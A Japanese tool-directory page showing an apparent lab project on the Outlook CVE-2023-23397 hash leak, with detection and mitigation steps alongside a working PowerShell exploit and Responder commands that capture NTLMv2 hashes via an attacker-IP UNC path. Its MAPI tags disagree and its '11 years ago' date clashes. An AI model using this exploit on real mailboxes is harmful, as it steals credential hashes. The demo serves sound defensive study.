Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-23397 — CVE-2023-23397 Outlook 権限昇格の脆弱性のデモ | Kitploit
ツール/GitHubGitHub/gilospy/cve-2023-23397
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHubgilospy/cve-2023-23397

CVE-2023-23397

CVE-2023-23397 Outlook 権限昇格の脆弱性のデモ

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-23397 の悪用と緩和デモ

📌 概要

このプロジェクトは、Microsoft Outlook for Windows における重大なゼロクリック NTLM リレー脆弱性である CVE-2023-23397 の検出、悪用、および緩和をデモンストレーションするものです。カレンダー招待を介して悪用されるこの脆弱性により、攻撃者は ユーザーの操作なしで NTLMv2 ハッシュを取得できます。

🛡️ CVSS スコア: 9.8(Critical)
🖥️ 影響を受けるバージョン: Outlook 2013、2016、2019、Microsoft 365(2023年3月14日のパッチ適用前)


⚠️ 脆弱性の詳細

Outlook のカレンダーリマインダーは、PidLidReminderFileParameter MAPI プロパティを使用してカスタムサウンドを再生するよう設定できます。Outlook は UNC パスを検証しないため、リマインダーがトリガーされるとリモート SMB リクエストが可能になります。

root@kitploit:~
\\attacker-ip\share\sound.wav

これにより、NTLMv2 ハッシュが攻撃者制御のサーバーに送信され、その後以下のことが可能になります:

  • オフラインでのクラッキング(パスワード回復)
  • 権限昇格のための NTLM リレー攻撃での使用

🔍 検出方法

MFCMAPI を使用してカレンダー項目を検査し、PidLidReminderFileParameter(MAPI タグ 0x851F001F)に悪意のある値が含まれていないか確認します。

手順:

  1. MFCMAPI を開く → QuickStart > Open Folder > Calendar の順に選択します
  2. Table > Set Columns に移動します
  3. プロパティタグ 0x808A001F を追加して、リマインダーファイルのパスを表示します
  4. 侵害の指標として UNC パスを探します

🛠️ 緩和技術

1. Microsoft パッチの適用(推奨)

2023年3月14日のパッチ(例:KB5002044)をインストールします。このパッチでは以下が導入されます:

  • リマインダーファイルのパスを検証する IsFileZoneLocalIntranetOrTrusted()
  • 信頼済みドメインを定義するグループポリシーオプション

テスト結果:
Outlook は イベント ID 1008 を記録し、信頼されていない SMB パスへのアクセスをブロックします。


2. IPsec ネットワークレベルの緩和(一時的)

a. すべての SMB をブロック

  • 送信 TCP 445(SMB)をブロックします
  • 信頼されていないネットワークへの NTLM 漏えいを防止します

b. 信頼済み IP のみを許可

  • 内部 IP(例:192.168.1.0/24)を定義します
  • 内部 SMB 使用のための業務継続性を維持します

📂 構築済みポリシー:OutlookMitigation.ipsec


💻 プロジェクトのセットアップ

環境

システムユーザー名パスワード
Kali Linuxkalikali
Windows 10 VMCVE-2023-23397vbox@123
メールアカウントvictim​@exploit.comvbox@123

攻撃者(Kali Linux)

root@kitploit:~
sudo apt install responder
sudo responder -I eth0 -v

Kali と被害者 VM が同じネットワーク上にあることを確認します。


被害者(Windows + Outlook 2013)

  1. インストール:

    • Outlook 2013
    • .NET 2.0
    • hMailServer
    • MFCMAPI
  2. セットアップ:

    • hMailServer のドメイン:exploit.com
    • メールユーザー:[email protected]

🚨 悪用(PowerShell スクリプト)

root@kitploit:~
# Initialize Outlook COM object
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNamespace("MAPI")
 
$ip = "192.168.1.7" # Attacker IP here
$emails = @("[email protected]")  # List of emails

# Create a new appointment item
$Appointment = $Outlook.CreateItem(1) # 1 corresponds to olAppointmentItem

# Set appointment properties
$Appointment.Subject = "CVE Presentation Demo Demo"
$Appointment.Body = "This is a test meeting, please ignore it."
$Appointment.Location = "Dubai"
$Appointment.Start = (Get-Date).AddSeconds(1) # Start time set to 1 second from now
$Appointment.Duration = 30 # Duration in minutes

# Configure reminder settings
$Appointment.ReminderSet = $true
$Appointment.ReminderMinutesBeforeStart = 0
$Appointment.ReminderOverrideDefault = $true
$Appointment.ReminderPlaySound = $true
$Appointment.ReminderSoundFile = "\\$ip\nonexistent\sound.wav"

foreach ($email in $emails) {
    $Appointment.Recipients.Add($email) | Out-Null
}

# Save and send the appointment
$Appointment.Save()
$Appointment.Send()

Responder は被害者システムから NTLMv2 ハッシュをキャプチャします。


✅ 検証

検出

  • MFCMAPI を使用して、PidLidReminderFileParameter に UNC パスが含まれていることを確認します。

緩和

  • パッチまたは IPsec ポリシーを適用します。
  • スクリプトを再実行します:Outlook はリマインダーを表示するかもしれませんが、NTLM ハッシュはキャプチャされないはずです。

❗ 制限事項

  • すべての SMB トラフィックをブロックすると、正当なサービス(ファイル共有、ドメイン認証)に影響を与える可能性があります
  • 信頼済み IP の維持は運用上複雑になる可能性があります

ツールをダウンロード